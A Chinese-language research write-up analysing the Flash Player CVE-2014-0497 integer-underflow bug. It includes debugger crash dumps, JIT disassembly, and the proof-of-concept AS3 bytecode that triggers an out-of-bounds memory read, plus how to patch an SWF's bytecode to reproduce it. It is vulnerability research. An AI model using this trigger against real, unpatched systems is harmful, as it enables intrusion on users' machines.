春节期间Adobe Flash播放器被爆出0Day漏洞(编号:CVE-2014-0497),该漏洞危害Flash 12.0.0.38以及之前的版本。Adobe官方已推出修复补丁。

该漏洞是由于SWF中嵌入AS3代码解析错误。在分析的样本文件中,通过AS3 Sorcerer查看样本文件中的AS3代码,AS3中利用了li32与ByteArray结合实现快速的内存读取。根据Adobe的官方解释,li32函数的参数是一个ByteArray数组的索引值,这个函数可以将ByteArray中的数据快速存取到变量中,但是这个索引值的大小必须在0到ByteArray的数组长度之间,意味着这个函数会进行边界检查,而在生成数组边界检查代码的时候会根据我们构造的数据判断是否为无符号数,这里我们构造了恶意数据使其生成了无符号数的比较代码。

在生成有符号数比较代码时会生成“sub esi,4”这条指令,这条指令主要是将数组长度减去4,防止从byte数组读取int数据时发生缓冲区溢出,而生成无符号数比较代码时,会生成“sub esi,80000004h”,esi中本来存储的是数组长度0×1000,经过这条指令后,变成一个负数,即很大的无符号数。进行无符号匹配跳转时,索引值比长度大的时会跳转到数组越界处理程序,而现在长度远比索引值大,所以可以继续往下执行,因此就会读取到数组外的数据,发生溢出。

Crash:

(17c.5e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8357e000 ebx=0357e000 ecx=02bcbaf0 edx=80002100 esi=80000000 edi=02843fc8
eip=02e5f45e esp=0012e728 ebp=0012e8c0 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00250286
02e5f45e 8b0410          mov     eax,dword ptr [eax+edx] ds:0023:03580100=????????

数组中的内容:

06cc4000  6f6d336d 00007972 00000000 00000000  m3mory..........
06cc4010  00000000 00000000 00000000 00000000  ................
06cc4020  00000000 00000000 00000000 00000000  ................
06cc4030  00000000 00000000 00000000 00000000  ................
06cc4040  00000000 00000000 00000000 00000000  ................
06cc4050  00000000 00000000 00000000 00000000  ................
06cc4060  00000000 00000000 00000000 00000000  ................
06cc4070  00000000 00000000 00000000 00000000  ................

在漏洞发生的时候是从eax数组中读取指定索引的数据,数据区不可访问出错。

0:000> kv
ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012e8c0 009d9231 066db910 00000000 0012e910 0x682cefc
0012e8e4 009d9f85 066db910 00000000 0012e910 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10beb1
0012e938 009d9a1e 066db910 00000000 0012e98c Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10cc05
0012e974 009c26fd 00000000 0012e98c 06663180 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10c69e
0012ea20 009c45be 01a23020 0191c1f0 00000000 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0xf537d
0012ea4c 0048ced4 018fb060 00000001 018fb060 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0xf723e
0012eae8 0048d32b 018fb060 0012ecc4 00000000 Flash_player_12_0!WinMainSandboxed+0x89be8
0012eb18 0048dd4c 00000008 00000000 0012ecc4 Flash_player_12_0!WinMainSandboxed+0x8a03f
0012ec7c 00426f3b 018fd0a0 07ffffff 07ffffff Flash_player_12_0!WinMainSandboxed+0x8aa60
00000000 00000000 00000000 00000000 00000000 Flash_player_12_0!WinMainSandboxed+0x23c4f

进行栈回溯

009d9220 8b4d10          mov     ecx,dword ptr [ebp+10h]
009d9223 8b5008          mov     edx,dword ptr [eax+8]
009d9226 8b5204          mov     edx,dword ptr [edx+4]
009d9229 51              push    ecx
009d922a 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
009d922d 51              push    ecx
009d922e 50              push    eax
009d922f ffd2            call    edx  //调用动态生成的代码。
009d9231 83c40c          add     esp,0Ch

在解析我们编写的AS3的代码TestExploit()之前,Flash还会解析其他的代码,如function script0$init():*,function script0$init():*,在将这些代码都解析完成之后,才会进入TestExploit()。
因此会多次进入动态生成的代码区,研究人员可以记录每次EDX,当发生崩溃后,进入最后一次的EDX代码区,对其进行分析。在研究漏洞的过程中,flash的计时器以及本身的机制会对结果造成很大的影响,所以在调试的时候要快速的找到断点,溢出的位置与EDX数据的偏移是一致的,可以在进入到虚拟代码时,对偏移地址下断点,这样就可以快速跟踪到溢出地点。
字节码:

6    constructsuper (0)
8    pushuint       2147483648  // 0x80000000  //被修改的字节码将double类型修改成Uint类型。
10   setlocal1
11   findpropstrict flash.utils::ByteArray //nameIndex = 2
13   constructprop  flash.utils::ByteArray (0) //nameIndex = 2
16   coerce         flash.utils::ByteArray //nameIndex = 2
18   setlocal2
19   getlocal2
20   pushshort      4096
23   setproperty    length //nameIndex = 7
25   getlocal2
26   pushstring     "m3mory"  //stringIndex = 18  //数组赋值
28   callpropvoid   writeUTFBytes (1) //nameIndex = 8
31   getlex         flash.system::ApplicationDomain //nameIndex = 13
33   getproperty    currentDomain //nameIndex = 5
35   getlocal2
36   setproperty    domainMemory //nameIndex = 6
38   getlocal1
39   pushint        2147475196  // 0x7fffdefc   该数据与变量相减取得索引压栈传递给li32
41   subtract
42   li32                  //在该函数中对上面传过来的索引进行比较发生了溢出
43   setlocal3
44   getlocal1
45   pushshort      8448
48   add
49   li32
50   pushint        305419896   // 0x12345678
52   ifne           L1

溢出点汇编代码

0682ced3 8b5014          mov     edx,dword ptr [eax+14h]  //数组的索引地址
0682ced6 8b7018          mov     esi,dword ptr [eax+18h]   //数组的大小
0682ced9 8d8300210080    lea     eax,[ebx-7*******h]   //ebx=_local4,eax为构造的数据做为读取数组的索引值。
0682cedf 81ee04000080    sub     esi,80000004h   //因为是从byte中读取int32数据,所以最后索引地址只能是数组长度-4,否则会造成溢出,但就是在做边界检查的时候发生了溢出,这里漏洞利用人员构造了特殊的结构,使这里不是减4,而是减80000004,这样esi就变成了负数,下面进行边界检查是用的无符号数的比较。
0682cee5 3bc6            cmp     eax,esi    //比较数组长度和要读取索引值
0682cee7 8bb5dcfeffff    mov     esi,dword ptr [ebp-124h]
0682ceed 0f878b000000    ja      0682cf7e     //若eax>esi跳转,如果小于则不跳转,原eax>esi,经过上面的减法之后造成了整数向下溢出,再进行无符号的匹配。如果正常跳转将会进入到,数组越界处理程序。
0682cef3 8bc2            mov     eax,edx    //eax存储数组索引
0682cef5 03c3            add     eax,ebx      //ebx是poc中构造的值
0682cef7 bb00210080      mov     ebx,80002100h  //将地址偏移赋值给ebx
0682cefc 8b0418          mov     eax,dword ptr [eax+ebx] ds:0023:06cd4000=????????
//读取数据是,在此由于我们构造的POC中暑给了足够大的距离使每次读取数据都可以发生溢出。
0682ceff 894588          mov     dword ptr [ebp-78h],eax
正常AS3生成的汇编代码
06b39f0e 8b45c8          mov     eax,dword ptr [ebp-38h]
06b39f11 8b5314          mov     edx,dword ptr [ebx+14h]
06b39f14 8b7318          mov     esi,dword ptr [ebx+18h]
06b39f17 8d9805210080    lea     ebx,[eax-7FFFDEFBh]
06b39f1d 8bfe            mov     edi,esi
06b39f1f 83ef04          sub     edi,4
06b39f22 3bdf            cmp     ebx,edi
06b39f24 7768            ja      06b39f8e
 
06b39f26 8bda            mov     ebx,edx
06b39f28 03d8            add     ebx,eax
06b39f2a bf05210080      mov     edi,80002105h
06b39f2f 8b1c3b          mov     ebx,dword ptr [ebx+edi]

正常AS3生成的汇编代码

06b39f0e 8b45c8          mov     eax,dword ptr [ebp-38h]
06b39f11 8b5314          mov     edx,dword ptr [ebx+14h]
06b39f14 8b7318          mov     esi,dword ptr [ebx+18h]
06b39f17 8d9805210080    lea     ebx,[eax-7FFFDEFBh]
06b39f1d 8bfe            mov     edi,esi
06b39f1f 83ef04          sub     edi,4      //此处为减4而不是减80000004
06b39f22 3bdf            cmp     ebx,edi
06b39f24 7768            ja      06b39f8e
 
06b39f26 8bda            mov     ebx,edx
06b39f28 03d8            add     ebx,eax
06b39f2a bf05210080      mov     edi,80002105h
06b39f2f 8b1c3b          mov     ebx,dword ptr [ebx+edi]


该漏洞的成因是因为,Flash在对无符号数和有符号的数据访问控制出错,导致了有符号整数向下溢漏洞。在研究POC的过程中可以使用,字节码修改工具修改swf文件的字节码,将一个有符号数修改成无符号数,那么在生成代码的时候就会生成错误代码。

正常的AS3文件生成字节码是:
pushdouble          2147483648  // 0x80000000
修改后的字节码
pushuint        2147483648  // 0x80000000

by Jason && hcl of code audit labs of vulnhunt.com

via/[vulnhunt]

源链接

Hacking more

...